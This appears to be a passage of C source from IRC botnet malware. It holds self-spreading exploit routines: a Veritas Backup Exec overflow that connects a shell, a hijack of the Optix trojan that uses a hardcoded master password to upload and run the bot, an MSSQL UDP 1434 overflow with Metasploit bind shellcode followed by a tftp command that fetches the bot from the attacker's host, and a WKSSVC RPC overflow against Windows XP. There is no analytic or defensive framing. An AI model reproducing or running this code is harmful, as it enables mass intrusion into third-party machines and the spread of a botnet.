VOID AinMessage::AddStr(LPCSTR pStr) { if(NULL == pStr) { assert(false); return; } WORD wStrLen = (WORD)strlen(pStr); AddWord(wStrLen); AddEx(pStr, wStrLen); }
bool veritasbackupserver(EXINFO exinfo) { SOCKET sock; if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false; SOCKADDR_IN sin; memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = fhtons((unsigned short)exinfo.port); sin.sin_addr.s_addr = finet_addr(exinfo.ip); char payload[800]; char v91sp0sp1[]="\xFF\x50\x11\x40"; char esisp0sp1[]="\xA1\xFF\x42\x01"; memcpy(&talk[37], &v91sp0sp1, 4); memcpy(&talk[72], &esisp0sp1, 4); //os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0"; strcpy(payload,veritassc); if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false; if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false; Sleep(10); for (int i=0; i < 7;i++) { if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false; Sleep(10); } Sleep(1000); fclosesocket(sock); ConnectShell(exinfo,101); return (AddEx(exinfo,true)); }
BOOL Optix(EXINFO exinfo) { char buffer[IRCLINE], szBuffer[64], szFilePath[MAX_PATH]; int read = 0; WSADATA opxdata, upldata; SOCKET opxsock, uplsock; SOCKADDR_IN opxinfo, uplinfo; bool IS11 = FALSE; if (WSAStartup(MAKEWORD(2,2), &opxdata) != 0) return FALSE; //Connect To Optix Main Port opxinfo.sin_addr.s_addr = inet_addr(exinfo.ip); opxinfo.sin_port = htons((unsigned short)exinfo.port); opxinfo.sin_family = AF_INET; opxsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); start: if (connect(opxsock, (LPSOCKADDR)&opxinfo, sizeof(opxinfo)) == SOCKET_ERROR) { closesocket(opxsock); WSACleanup(); return FALSE; } //Auth //Note: OPTIX BLOCKS YA ASS UNTIL RESTART IF PASS IS WRONG 3TIMES :/ if (IS11 == TRUE) sprintf(szBuffer, "022¬kjui3498fjk34289890fwe334gfew4ger$\"sdf¬v1.1\r\n"); //MASTERPASSWORD = 1.1 Server else sprintf(szBuffer, "022¬kjui3498fjk34289890fwe334gfew4ger$\"sdf¬v1.2\r\n"); //MASTERPASSWORD = 1.2 Server send(opxsock, szBuffer, strlen(szBuffer), 0); Sleep(500); memset(szBuffer, 0, sizeof(szBuffer)); recv(opxsock, szBuffer, sizeof(szBuffer), 0); //1.1 Check if (strstr(szBuffer, "001¬Your client version is outdated!") != NULL) { //1.1 Server IS11 = TRUE; closesocket(opxsock); goto start; } //All Others if (strstr(szBuffer, "001¬") == NULL) { //001 Should Be The Same On All Versions, Therefore strstr(); Sleep(500); //If "OPtest" Dont Work, Try NULL Password if (IS11 == TRUE) sprintf(szBuffer, "022¬¬v1.1\r\n"); //NULL Password, 1.1 Server else sprintf(szBuffer, "022¬¬v1.2\r\n"); //NULL Password, 1.2 Server send(opxsock, szBuffer, strlen(szBuffer), 0); Sleep(500); memset(szBuffer, 0, sizeof(szBuffer)); recv(opxsock, szBuffer, sizeof(szBuffer), 0); if (strstr(szBuffer, "001¬") == NULL) { //001 Should Be The Same On All Versions, Therefore strstr(); closesocket(opxsock); WSACleanup(); return FALSE; } } //Prepare Optix For Upload send(opxsock, "019¬\r\n", 6, 0); Sleep(500); memset(szBuffer, 0, sizeof(szBuffer)); recv(opxsock, szBuffer, sizeof(szBuffer), 0); if (strcmp(szBuffer, "020¬\r\n") != 0) { closesocket(opxsock); WSACleanup(); return FALSE; } //Get FilePath memset(szFilePath, 0, sizeof(szFilePath)); GetModuleFileName(NULL, szFilePath, sizeof(szFilePath)); //sprintf(szFilePath, szLocalPayloadFile); //Open File FILE *f = fopen(szFilePath, "rb"); if (f == NULL) { closesocket(opxsock); WSACleanup(); return FALSE; } //Connect To Upload Socket.. if (WSAStartup(MAKEWORD(2,2), &upldata) != 0) { closesocket(opxsock); WSACleanup(); return FALSE; } uplinfo.sin_addr.s_addr = inet_addr(exinfo.ip); uplinfo.sin_port = htons(500); uplinfo.sin_family = AF_INET; uplsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (connect(uplsock, (LPSOCKADDR)&uplinfo, sizeof(uplinfo)) == SOCKET_ERROR) { closesocket(uplsock); closesocket(opxsock); WSACleanup(); return FALSE; } //Send File Info (Where To Upload And Size..) HANDLE hFile = CreateFile(szFilePath, GENERIC_READ,FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); DWORD dwSize = GetFileSize(hFile, 0); CloseHandle(hFile); sprintf(szBuffer, "C:\\a.exe\r\n%d\r\n", dwSize); send(uplsock, szBuffer, strlen(szBuffer), 0); Sleep(500); memset(szBuffer, 0, sizeof(szBuffer)); recv(uplsock, szBuffer, sizeof(szBuffer), 0); //OK REDY Received, Upload File.. if (strstr(szBuffer, "+OK REDY") == NULL) { closesocket(uplsock); closesocket(opxsock); WSACleanup(); return FALSE; } //Upload \o/ memset(szBuffer, 0, sizeof(szBuffer)); while (!feof(f)) { read = fread(szBuffer, sizeof(char), sizeof(szBuffer), f); send(uplsock, szBuffer, read, 0); } memset(szBuffer, 0, sizeof(szBuffer)); recv(uplsock, szBuffer, sizeof(szBuffer), 0); //Execute File If Upload Success if (strstr(szBuffer, "+OK RCVD") != NULL) { closesocket(uplsock); send(opxsock, "008¬C:\\a.exe\r\n", 14, 0); Sleep(500); memset(szBuffer, 0, sizeof(szBuffer)); recv(opxsock, szBuffer, sizeof(szBuffer), 0); if (strcmp(szBuffer, "001¬Error Executing File\r\n") == 0) { closesocket(uplsock); closesocket(opxsock); WSACleanup(); return FALSE; } } else { closesocket(uplsock); closesocket(opxsock); WSACleanup(); return FALSE; } //Remove Optix Server send(opxsock, "100¬\r\n", 6, 0); closesocket(uplsock); closesocket(opxsock); WSACleanup(); AddEx(exinfo); return TRUE; }
bool MSSQLResolution(EXINFO exinfo) { /* win32_bind - EXITFUNC=process LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */ unsigned char scode[] = "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x27\xc8" "\x3e\x83\xeb\xfc\xe2\xf4\x6b\x4d\x23\x73\x7f\xde\x37\xc1\x68\x47" "\x43\x52\xb3\x03\x43\x7b\xab\xac\xb4\x3b\xef\x26\x27\xb5\xd8\x3f" "\x43\x61\xb7\x26\x23\x77\x1c\x13\x43\x3f\x79\x16\x08\xa7\x3b\xa3" "\x08\x4a\x90\xe6\x02\x33\x96\xe5\x23\xca\xac\x73\xec\x16\xe2\xc2" "\x43\x61\xb3\x26\x23\x58\x1c\x2b\x83\xb5\xc8\x3b\xc9\xd5\x94\x0b" "\x43\xb7\xfb\x03\xd4\x5f\x54\x16\x13\x5a\x1c\x64\xf8\xb5\xd7\x2b" "\x43\x4e\x8b\x8a\x43\x7e\x9f\x79\xa0\xb0\xd9\x29\x24\x6e\x68\xf1" "\xae\x6d\xf1\x4f\xfb\x0c\xff\x50\xbb\x0c\xc8\x73\x37\xee\xff\xec" "\x25\xc2\xac\x77\x37\xe8\xc8\xae\x2d\x58\x16\xca\xc0\x3c\xc2\x4d" "\xca\xc1\x47\x4f\x11\x37\x62\x8a\x9f\xc1\x41\x74\x9b\x6d\xc4\x74" "\x8b\x6d\xd4\x74\x37\xee\xf1\x4f\xd9\x62\xf1\x74\x41\xdf\x02\x4f" "\x6c\x24\xe7\xe0\x9f\xc1\x41\x4d\xd8\x6f\xc2\xd8\x18\x56\x33\x8a" "\xe6\xd7\xc0\xd8\x1e\x6d\xc2\xd8\x18\x56\x72\x6e\x4e\x77\xc0\xd8" "\x1e\x6e\xc3\x73\x9d\xc1\x47\xb4\xa0\xd9\xee\xe1\xb1\x69\x68\xf1" "\x9d\xc1\x47\x41\xa2\x5a\xf1\x4f\xab\x53\x1e\xc2\xa2\x6e\xce\x0e" "\x04\xb7\x70\x4d\x8c\xb7\x75\x16\x08\xcd\x3d\xd9\x8a\x13\x69\x65" "\xe4\xad\x1a\x5d\xf0\x95\x3c\x8c\xa0\x4c\x69\x94\xde\xc1\xe2\x63" "\x37\xe8\xcc\x70\x9a\x6f\xc6\x76\xa2\x3f\xc6\x76\x9d\x6f\x68\xf7" "\xa0\x93\x4e\x22\x06\x6d\x68\xf1\xa2\xc1\x68\x10\x37\xee\x1c\x70" "\x34\xbd\x53\x43\x37\xe8\xc5\xd8\x18\x56\xe9\xff\x2a\x4d\xc4\xd8" "\x1e\xc1\x47\x27\xc8\x3e"; unsigned long targets[]={ 0x42b48774 /*MSQL 2000 / MSDE*/ }; unsigned short sqlport = 1434; char *request=(char*)malloc(1+800+5+1+sizeof(scode)); //\x68:888 => push dword 0x3838383a memcpy(request+0, "\x04", 1); memset(request+1, 0x90, 800); memcpy(request+801, "\x68:888", 5); memcpy(request+806, "\x90", 1); memcpy(request+807, scode, sizeof(scode)); //return address of jmp esp memcpy(request+97, (char*)&targets[0], 4); //takes us right here, with 8 bytes available memcpy(request+101, "\xeb\x69\xeb\x69", 8); //write to thread storage space ala msrpc memcpy(request+109, "\xcc\xe0\xff\x7f", 4); //0x7ffde0cc memcpy(request+113, "\xcc\xe0\xff\x7f", 4); //the payload starts here memset(request+117, 0x90, 100); memcpy(request+217, scode, sizeof(scode)); SOCKET s; if ((s=fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET) return false; SOCKADDR_IN ssin; ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)sqlport); if (fconnect(s, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return false; if (fsend(s, request, strlen(request), 0) == SOCKET_ERROR) return false; fclosesocket(s); //automatically restart sql server - thanks SK! s=fsocket(AF_INET, SOCK_STREAM, 0); memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)4444); if(fconnect(s, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return false; char cmd_buff[400]; _snprintf(cmd_buff, sizeof(cmd_buff), "net start sqlserveragent & " "tftp -i %s GET %s & " "%s", exinfo.myip, filename, filename); if(fsend(s,(char*)cmd_buff, strlen(cmd_buff),0) == SOCKET_ERROR) return false; fclosesocket(s); return (AddEx(exinfo,true)); }
bool ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo ) { int TargetOS; char szShellBuf[ 512 ]; int iShellSize; // ============================= char* pszTarget; // --- char szNetbiosTarget[ 8192 ]; wchar_t wszNetbiosTarget[ 8192 ]; unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ]; unsigned char szExploitsData[ 3500 ]; unsigned long nExploitsDataPos; wchar_t wszExploitsData[ sizeof( szExploitsData ) ]; // --- char szIPC[ 8192 ]; NETRESOURCE NetSource; // --- char szPipe[ 8192 ]; HANDLE hPipe; // --- RPC_ReqBind BindPacket; unsigned long nBytesWritten; RPC_ReqNorm ReqNormalHeader; unsigned long nPacketSize; unsigned char* pPacket; unsigned long nPacketPos; // ============================ // check if xp TargetOS = FpHost( exinfo.ip, FP_LSASS ); if( TargetOS != OS_WINXP ) return false; // parameters pszTarget = exinfo.ip; // get shellcode iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), exinfo.myip, filename ); if( !iShellSize ) return false; // generate exploits buffer // ======================== memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) ); memset( szExploitsData, 0, sizeof( szExploitsData ) ); memset( wszExploitsData, 0, sizeof( wszExploitsData ) ); // fill with NOPs (using inc ecx instead of NOP, 0-terminated-string) memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 ); // new EIP *(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP; // some NOPs nExploitsDataPos = 2300; // add stack memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 ); nExploitsDataPos += sizeof( szStack ) - 1; // add decoder memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 ); nExploitsDataPos += sizeof( szDecoder ) - 1; // add shellcode // - bind port // - encode Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded ); // - add memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) ); nExploitsDataPos += strlen( (char*)szShellcodeEncoded ); // - 0 terminaten for decoder szExploitsData[ nExploitsDataPos ] = 0; nExploitsDataPos += 1; // convert to UNICODE // ================== for( int n = 0; n < sizeof( szExploitsData ); n++ ) wszExploitsData[ n ] = szExploitsData[ n ]; //MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) ); snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget ); mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) ); // create NULL session // =================== if( strcmpi( pszTarget, "." ) ) { snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget ); memset( &NetSource, 0 ,sizeof( NetSource ) ); NetSource.lpRemoteName = szIPC; fWNetAddConnection2( &NetSource, "", "", 0 ); } // =================== // connect to pipe // =============== snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget ); hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if( hPipe == INVALID_HANDLE_VALUE ) { fWNetCancelConnection2( NetSource.lpRemoteName, 0, false ); return false; } // =============== // bind packet // =========== memset( &BindPacket, 0, sizeof( BindPacket ) ); BindPacket.NormalHeader.versionmaj = 5; BindPacket.NormalHeader.versionmin = 0; BindPacket.NormalHeader.type = 11; // bind BindPacket.NormalHeader.flags = 3; // first + last fragment BindPacket.NormalHeader.representation = 0x00000010; // little endian BindPacket.NormalHeader.fraglength = sizeof( BindPacket ); BindPacket.NormalHeader.authlength = 0; BindPacket.NormalHeader.callid = 1; BindPacket.maxtsize = 4280; BindPacket.maxrsize = 4280; BindPacket.assocgid = 0; BindPacket.numelements = 1; BindPacket.contextid = 0; BindPacket.numsyntaxes = 1; BindPacket.Interface1.version = 1; memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 ); BindPacket.Interface2.version = 2; memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 ); // send if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) ) { CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, false ); return false; } // =========== // request // ======= // generate packet // --------------- // calc packet size nPacketSize = 0; nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; nPacketSize += 8; // szWSSKVCUnknown3 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += 4; // NetAddAlternateComputerName = reserved else nPacketSize += 2; // NetValidateName = NameType // alloc packet pPacket = (unsigned char*)malloc( nPacketSize ); if( !pPacket ) { CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, false ); return false; } memset( pPacket, 0, nPacketSize ); // build packet nPacketPos = 0; // - szWKSSVCUnknown1 memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1; // - wszNetbiosTarget ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget ); nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWKSSVCUnknown2 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1; } // - wszExploitsData ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData ); nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWSSKVCUnknown3 (only eigth 0x00s) memset( &pPacket[ nPacketPos ], 0, 8 ); nPacketPos += 8; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { // NetAddAlternateComputerName = 0 *(DWORD*)&pPacket[ nPacketPos ] = 0; nPacketPos += sizeof( DWORD ); } else { // NetValidateName = NetSetupMachine *(unsigned short*)&pPacket[ nPacketPos ] = 1; nPacketPos += 2; } // header memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) ); ReqNormalHeader.NormalHeader.versionmaj = 5; ReqNormalHeader.NormalHeader.versionmin = 0; ReqNormalHeader.NormalHeader.type = 0; // request ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian ReqNormalHeader.NormalHeader.authlength = 0; ReqNormalHeader.NormalHeader.callid = 1; ReqNormalHeader.prescontext = 0; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName else ReqNormalHeader.opnum = 25; // NetrValidateName2 // send if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) ) { CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, false ); return false; } // ======= // clean up // =================; CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, false ); return (AddEx(exinfo,true)); }